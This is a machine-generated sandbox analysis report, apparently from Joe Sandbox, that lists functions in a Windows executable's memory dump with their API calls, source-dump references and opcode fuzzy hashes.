CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BD9F27,?,?,00BD771A), ref: 00BD96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BD9F27,?,?,00BD771A), ref: 00BD9716

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a444715827db890ad4d0e8adccec72e5ba151043358ea28594c6a1c43671f20f
Instruction ID: edcae216baff3fe699f1bab4e8553c267e64e6064f46a3d604de1fea2d3b6ce3
Opcode Fuzzy Hash: a444715827db890ad4d0e8adccec72e5ba151043358ea28594c6a1c43671f20f
Instruction Fuzzy Hash: 8821CF71100344AFE3309A65CC89FA7B7DCEB49324F100A5AFA96C22D1E7B4A884DB31

Function 00BD9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BD9EC7
GetLastError.KERNEL32 ref: 00BD9ED4

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5018d7e7dae3dab883a27f23707b1ecd9653868c5df58366ba6d19588b5f407d
Instruction ID: 64de9e965afb1d3dfa15c35dd9fbc9d3e2dfc80fefbe8921ac747e23d5571c54
Opcode Fuzzy Hash: 5018d7e7dae3dab883a27f23707b1ecd9653868c5df58366ba6d19588b5f407d
Instruction Fuzzy Hash: 2911E530600704EBE724C628C880BA6F7E9EB45360F504AABE552D27D0F774ED89C760

Function 00BF8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BF8E75

Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00C11098,00BD17CE,?,?,00000007,?,?,?,00BD13D6,?,00000000), ref: 00BF8EB1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: b1e62576630e7cc1389f49d9710f9ce85c9d7e49242b8c771189e529acf694d4
Instruction ID: 6cc15050c507d26cb2a1489ae7c2869b1aae61edfc83bf84ed245faf2a55b2d0
Opcode Fuzzy Hash: b1e62576630e7cc1389f49d9710f9ce85c9d7e49242b8c771189e529acf694d4
Instruction Fuzzy Hash: 80F0963260511D76DB212A25AC05B7F77D8CF91B70F2541E5FB14A7191DF70DD0985A0

Function 00BE109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00BE10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00BE10B2

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: de6ad8d0ea808256b5302e80cf60d391e89870736dbdb68abc997eb9360da273
Instruction ID: e367edfd9b5aff152c0243e57ce35b848087f927edabd902e812ae36a273d4d0
Opcode Fuzzy Hash: de6ad8d0ea808256b5302e80cf60d391e89870736dbdb68abc997eb9360da273
Instruction Fuzzy Hash: C2E0D832B101C5E7CF0987B99C05AEF73DDEA4420873085B6E403D3102FA34DE418760

Function 00BF8268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00BFBF30: GetEnvironmentStringsW.KERNEL32 ref: 00BFBF39
Part of subcall function 00BFBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BFBF5C
Part of subcall function 00BFBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BFBF82
Part of subcall function 00BFBF30: _free.LIBCMT ref: 00BFBF95
Part of subcall function 00BFBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BFBFA4

_free.LIBCMT ref: 00BF82AE
_free.LIBCMT ref: 00BF82B5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 8a10e3b061749db9538446e1cca1928a879aca35a28f369955465bdd02b3eb66
Instruction ID: 23a7574a14a8810f14d541b3f1760bbd91994cc9028e722c96d9a61d7225296e
Opcode Fuzzy Hash: 8a10e3b061749db9538446e1cca1928a879aca35a28f369955465bdd02b3eb66
Instruction Fuzzy Hash: 6EE02B33616D4E419B6532397C42B7F06C08F82338B1502EAF710C70C3CF50880E04A2

Function 00BDA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501

Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 202cd50d5fec49f1031c21cbc24604ebeb3a9657f773ec97372bf58c800bde0e
Instruction ID: b9f3c8029d9daab99ad2161b7841f7dc895d5f8ea0b723e614074fd796d23eb3
Opcode Fuzzy Hash: 202cd50d5fec49f1031c21cbc24604ebeb3a9657f773ec97372bf58c800bde0e
Instruction Fuzzy Hash: DEF06532240149BBDF016F60DC45FDE77ACEF14389F4480A2B945D5260EB71DAD8DB60

Function 00BDA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641,000000FF), ref: 00BDA1F1

Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641), ref: 00BDA21F

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 2c6afba8cf2c414d39ec2c36350bc3de879b970f4ccc302f47097346cb521eb4
Instruction ID: 8bd39e64fbe834e0ed94962a93e2fb9ad7ac406fd642b8294d1e2cb82d891f2b
Opcode Fuzzy Hash: 2c6afba8cf2c414d39ec2c36350bc3de879b970f4ccc302f47097346cb521eb4
Instruction Fuzzy Hash: D7E092311402497BDB015F61DC45FDD779CEB08385F4840A2B944D2150FB61DE84DA54

Function 00BEAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00C02641,000000FF), ref: 00BEACB0
CoUninitialize.COMBASE(?,?,?,?,00C02641,000000FF), ref: 00BEACB5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 5ccc94d8003c04c5d3a34fd10d930c13dd2a8730d94048f3441bc01ea57a18f2
Instruction ID: 1ff536ffade7f25af1b55a30837bb07525276ac33b2af516f9dca812bf2d80d0
Opcode Fuzzy Hash: 5ccc94d8003c04c5d3a34fd10d930c13dd2a8730d94048f3441bc01ea57a18f2
Instruction Fuzzy Hash: 31E06D72604690EFCB009B59DC4AB49FBACFB89B20F00426AF416D37A0CB74A940CA90

Function 00BDA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00BDA23A,?,00BD755C,?,?,?,?), ref: 00BDA254

Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BDA23A,?,00BD755C,?,?,?,?), ref: 00BDA280

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 1d3d831dedad4815aaea8a477844d8bcc8db73735c1ab7f4a21522f23fbd469d
Instruction ID: 1cf0e9d957b6612d59edf6654e6823cfc39db14afda68698f9d195330ebc71c2
Opcode Fuzzy Hash: 1d3d831dedad4815aaea8a477844d8bcc8db73735c1ab7f4a21522f23fbd469d
Instruction Fuzzy Hash: 97E092315001649BDB20AB64CC05BD9F79CEB083E5F0542A2FD54E3294E770DE44CAA0

Function 00BEDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BEDEEC

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00BEDF03

Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
Part of subcall function 00BEB568: IsDialogMessageW.USER32(000103FE,?), ref: 00BEB59E
Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 9521570ca401f1cfd8e5257f35359adaf454247bb5610b9d16913680f95df5f0
Instruction ID: c9fca0a6a774d2801dcae4d86a2e7344e08c87b1cc3818b18237f6618bba25d6
Opcode Fuzzy Hash: 9521570ca401f1cfd8e5257f35359adaf454247bb5610b9d16913680f95df5f0
Instruction Fuzzy Hash: 52E092B251428866DF02AB61DC06FDE3BECAB15785F044892B201DA1E2EA78EA148761

Function 00BE081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 64b27637e3c3d55f0c90828438cbdc25aec5cc40504acbc305dd45996f6d2af5
Instruction ID: c1ab7e66b73ad9cadf1f09ea0f6f2b952297bbaa4b5905d8e3d8af09d1498531
Opcode Fuzzy Hash: 64b27637e3c3d55f0c90828438cbdc25aec5cc40504acbc305dd45996f6d2af5
Instruction Fuzzy Hash: 66E048764011986BDB11A795DC05FDA77ECEF0D3D1F0500A67645D2104D7B4DA84CBB0

Function 00BEA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BEA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BEA3E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: e67135f253f21952792b6106f9661b01bb3aecb2ca15999bea81ee152065fd55
Instruction ID: 3017bbb523d9d68db9dccdd468beb53fe8ee5ebdc153216fa08ac955bb29cdac
Opcode Fuzzy Hash: e67135f253f21952792b6106f9661b01bb3aecb2ca15999bea81ee152065fd55
Instruction Fuzzy Hash: 6AE0EDB1900258EBCB10DF5AC541799BBE8EF04360F20C09AA85693241E374EE04DB91

Function 00BF2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BF2BB5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: ea563862d98f16d1ba6084fe12dc41882c61b5f237877f031adbf383bcd0c616
Instruction ID: f893de811b550c779b40bb8558e7be6c4beaec9aa04b2bda4cacf7f03b2a0ae0
Opcode Fuzzy Hash: ea563862d98f16d1ba6084fe12dc41882c61b5f237877f031adbf383bcd0c616
Instruction Fuzzy Hash: 8AD0A9381A830C18AC182B782A06A7823C5ED41B71BA016EAEF20874C3EA10804CA411

Function 00BD12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00BD1306
ShowWindow.USER32(00000000), ref: 00BD130D

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 22f7689221cce11a0941a550e0dc567513789c53322fa76e6d1f796608f612a9
Instruction ID: d7757a33d0c38603b2d3b1f20e17ae92a21a79ab2db5087b310a9e6d2c3ff3aa
Opcode Fuzzy Hash: 22f7689221cce11a0941a550e0dc567513789c53322fa76e6d1f796608f612a9
Instruction Fuzzy Hash: 92C0123226C280BECB010BB4DC09E2FBBA8ABA5312F04C908B4A5C0060C238C110DB11

Function 00BD1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD1A09

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 96eb43120e3fd3a0e5e46a9907b07323b4a195a7d82a503bfb9fd0e950105612
Instruction ID: 1a40b9365eff1ae7d7ca5e0099a7181caca39765335d844969998ecb4042ec02
Opcode Fuzzy Hash: 96eb43120e3fd3a0e5e46a9907b07323b4a195a7d82a503bfb9fd0e950105612
Instruction Fuzzy Hash: CAC18370A00254ABEF15CF6CC498BA9BBE5EF15310F1809FBEC559B396EB309944CB61

Function 00BD3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD3BBF

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5e3a8df4932a02ad9d68b2e8785afbdce9e2ded0021e092198566474c2e43ef5
Instruction ID: 1e54b6ad2b74385a7f135d620045233a3f4374623ddb5c3e070290f2e593016f
Opcode Fuzzy Hash: 5e3a8df4932a02ad9d68b2e8785afbdce9e2ded0021e092198566474c2e43ef5
Instruction Fuzzy Hash: 4971C271500B849ECB25DB70C8959E7F7E9EF14701F4409AFE1AB87342EA326684DF12

Function 00BD8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD8289

Part of subcall function 00BD13DC: __EH_prolog.LIBCMT ref: 00BD13E1

Part of subcall function 00BDA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 52a79ac8c54465e8c0c958df03df5587d6c2622debc40cf59ad3ec938be44445
Instruction ID: fc38769f0b92b9c92425472b660919afe968973f7d43f9427d88fd8a92052380
Opcode Fuzzy Hash: 52a79ac8c54465e8c0c958df03df5587d6c2622debc40cf59ad3ec938be44445
Instruction Fuzzy Hash: 2B4193719446589ADB24EB60CC55AEAF3E8EF00704F0404EBE08E97283FB745EC4CB10

Function 00BD13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD13E1

Part of subcall function 00BD5E37: __EH_prolog.LIBCMT ref: 00BD5E3C

Part of subcall function 00BDCE40: __EH_prolog.LIBCMT ref: 00BDCE45

